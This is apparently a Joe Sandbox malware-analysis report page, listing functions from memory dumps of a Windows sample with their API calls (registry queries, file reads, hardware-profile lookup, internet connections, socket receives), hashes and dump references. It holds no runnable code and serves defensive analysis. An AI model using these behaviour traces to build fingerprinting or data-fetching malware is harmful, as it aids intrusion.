Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 5bf39eeb8429b2e1e894f5f4a1b962eb1f45baaf2a6f6124d4ba21e90932bc32
Instruction ID: 388b663cd03d39f80f50d475d93cd831f3f2e371ee9bc947d3978df59fcdba6b
Opcode Fuzzy Hash: 5bf39eeb8429b2e1e894f5f4a1b962eb1f45baaf2a6f6124d4ba21e90932bc32
Instruction Fuzzy Hash: C4F039B5B00206DFCB48CF68DC91EAE37E4EF48608B00452D9C0AD7352DB35EA46CB88

Function 004201DD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00420203

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 09cf041921f8d812a03cd92ce09bdd756483eb483413b886829381557a68340a
Instruction ID: 1306499c0ef12e4b281d1e0d9f1773bcc1477dc02738e653858cc0b94a33e762
Opcode Fuzzy Hash: 09cf041921f8d812a03cd92ce09bdd756483eb483413b886829381557a68340a
Instruction Fuzzy Hash: 5AF0F870204306DFC700DF24C8C0A99F7F6FB89301F548969E4848B261E771E886CF91

Function 0042E2A9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32 ref: 0042E2DB

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 9cc6d87d98baf909a260f5622d38774094ed4254efd2e24a4170faa64fd6c2fd
Instruction ID: da4bc58ef716eeb179b7363dd168ef0d2ab5a028fb11f15414fcb7681e24734c
Opcode Fuzzy Hash: 9cc6d87d98baf909a260f5622d38774094ed4254efd2e24a4170faa64fd6c2fd
Instruction Fuzzy Hash: 3AF05EB0604306DFC714DF15C48196ABBE0FFD8300F10CA2EE88543221D770E590CB82

Function 0042E393 Relevance: 1.5, APIs: 1, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,?), ref: 0042E3BE

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e9c8dcff221161336529934429f0e008fec03a56920596d20f5698f67698f351
Instruction ID: 17a5e384e04dbe4012146239218b04c71fd024ab7241eb6648189c1e5676b59e
Opcode Fuzzy Hash: e9c8dcff221161336529934429f0e008fec03a56920596d20f5698f67698f351
Instruction Fuzzy Hash: 05E0EDB6205213AFC7119F04CC45E5B7BA5EB98355F22892DF9409B2B2C630E956CB8A

Function 004305FF Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 0043060D

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: e033ed8e78fa270c3ff6409379c1e9c9d3e5c0262c30eaa311f02c2c5c84f4e5
Instruction ID: 59b514b9c1fa0b22063893853964019622cff9fcf6fed364e53aaf9868ddf28e
Opcode Fuzzy Hash: e033ed8e78fa270c3ff6409379c1e9c9d3e5c0262c30eaa311f02c2c5c84f4e5
Instruction Fuzzy Hash: D7E086BA3011005FD210E75CFCC9E6E77ACBB88712F104019F640CF3D4CAB59855CA55

Function 0040167F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043C90E), ref: 004016B0

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocNumaVirtual
String ID:
API String ID: 4233825816-0
Opcode ID: 4f8af259bf6376182aa765b7fb337ef6435cc8c31ae0ff464cb7e3f48b03f0cf
Instruction ID: ad7aea396c197a5b1853f485f8964b67d9a17e3a3fc3a37fd52278f19f40f846
Opcode Fuzzy Hash: 4f8af259bf6376182aa765b7fb337ef6435cc8c31ae0ff464cb7e3f48b03f0cf
Instruction Fuzzy Hash: 71E09272A19B408BC708FF3CDD5572D7BE0AF85609F44815CD844972A2EB30DA55C7D6

Function 0043069E Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004306C2

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9d01d631cfcf269a2dd5630fbec9778bbeecb25986dc9904f6a5bd00330ccf22
Instruction ID: 7aafd60f9fde0df30e2277ba18362d22fbbbbe0d00e83e07ff97da2d7746e9ba
Opcode Fuzzy Hash: 9d01d631cfcf269a2dd5630fbec9778bbeecb25986dc9904f6a5bd00330ccf22
Instruction Fuzzy Hash: D4E09AB93017018FC304CF28EC92E0B77F1AB89B41B158928F90187362EB30E811CB1A

Function 00418925 Relevance: 1.5, APIs: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET ref: 00418953

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: 30f3ed7f7fa52f8ec0efc684cdfc4fe03af83ce1ef97569b36a5141c4d226eaa
Instruction ID: e1c5b21f769f02cb01caccd413d00cd593d91cc130ec9661ab253113a64bb2e6
Opcode Fuzzy Hash: 30f3ed7f7fa52f8ec0efc684cdfc4fe03af83ce1ef97569b36a5141c4d226eaa
Instruction Fuzzy Hash: 33F03470A093018FD304CF28D18466ABBF1BFC8305F10CA6DE44897225EB70D882CB46

Function 0042F232 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000), ref: 0042F259

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 42307ce5700113cc83515af5c1cccccf073dd35c55cc0e9d9512166d8d80b19f
Instruction ID: f4ae25cfb55fed1d38db322ecf797b22f74c657e57888a169d821529998d2890
Opcode Fuzzy Hash: 42307ce5700113cc83515af5c1cccccf073dd35c55cc0e9d9512166d8d80b19f
Instruction Fuzzy Hash: 97E04FBA2012108FE700DB25DD40C1A33AAAFD57113278715DD12A3359E774EE11CA95

Function 0041CBCD Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0041CC01

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 214d26c772d636acbfda49c83b83e36f616426d355294ba7541bbb3b28e11a4e
Instruction ID: f13649728f6b8cf53804a92622954e4a34ccbb6b4d0b7716b7c751a69a32255f
Opcode Fuzzy Hash: 214d26c772d636acbfda49c83b83e36f616426d355294ba7541bbb3b28e11a4e
Instruction Fuzzy Hash: 74F0ED705043018FD300EF6CDC9076873E0BF90704F000A2CE841E32B2DF3599898B89

Function 0042DCB1 Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?), ref: 0042DCD0

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f8b69fd56bd361c6e0d9be0422e3342bfe6943253522aecbe2f1b9df9c20fad8
Instruction ID: 6ab03abf05825c2763c9670960140e717c20cf7866119166e870121155647a5d
Opcode Fuzzy Hash: f8b69fd56bd361c6e0d9be0422e3342bfe6943253522aecbe2f1b9df9c20fad8
Instruction Fuzzy Hash: 42E01A32201101AFCB14BF06EC48D867BB5EFC6747B000438F65446261C7219922DB53

Function 0041CD6E Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041CD89

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 962e640fd56698dff73a918a277574572567592bb71662d0de3609c0635d39d9
Instruction ID: 06d2f6d672fbcee7aa621c698bc6ffd85c5d53ad97c3885d8ab3905aa6cdcc44
Opcode Fuzzy Hash: 962e640fd56698dff73a918a277574572567592bb71662d0de3609c0635d39d9
Instruction Fuzzy Hash: 53E01270B00207DFD704CF55CD80AAAB7BABF84605B54865CD40997219DB369D16C794

Function 0042E69B Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentHwProfileA.ADVAPI32(?), ref: 0042E6BD

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: b2d597882cf1155557b3b3fe48912788889ab19c7d11b059bdf31d48ff07a0e0
Instruction ID: 4283c57a7ab19923ac7e8caf67ae336aa2706f08777214b33feacf9787fe7a02
Opcode Fuzzy Hash: b2d597882cf1155557b3b3fe48912788889ab19c7d11b059bdf31d48ff07a0e0
Instruction Fuzzy Hash: F1E012722013059BD314FF28ED90D9B37ADAFD6385F05852CE9418736AEA34E825DB92

Function 0042D66C Relevance: 1.5, APIs: 1, Instructions: 18registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(?,?,?,?,?,?), ref: 0042D689

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 725ddee3a005ea6ee62bb5431ebf099f3694dd74c64d863e5814e00f97f5c12a
Instruction ID: ebf244302e688d40579662589a7d271a28f07b48063c6ba84c2407962e18c245
Opcode Fuzzy Hash: 725ddee3a005ea6ee62bb5431ebf099f3694dd74c64d863e5814e00f97f5c12a
Instruction Fuzzy Hash: 17E0ECB5215221EFD600AB48ED49C5A7F75FFCCB42B4149ACF54887231C331D825DB52

Function 0041BEB2 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00001000,00000000), ref: 0041BECE

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642478764.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642547964.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642601345.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2642644724.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2643223323.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 7c997f596d6fae21949b8e7c5eebd4f299c4ff9f3ec787349acd6699d7193efe
Instruction ID: fe729bae827430c567c048ec2fd2e27d1d4e0280f016dea6c10d1402d0b8ed55
Opcode Fuzzy Hash: 7c997f596d6fae21949b8e7c5eebd4f299c4ff9f3ec787349acd6699d7193efe
Instruction Fuzzy Hash: BDE01775310341DBE355DB1CCCA6F5A32EAEB88381F85042DA606DB392EEA4ED04C719

Function 00418B3F Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,000007CF,?), ref: 00418B55

Memory Dump Source

Source File: 00000000.00000002.2642390884.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2642333351.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
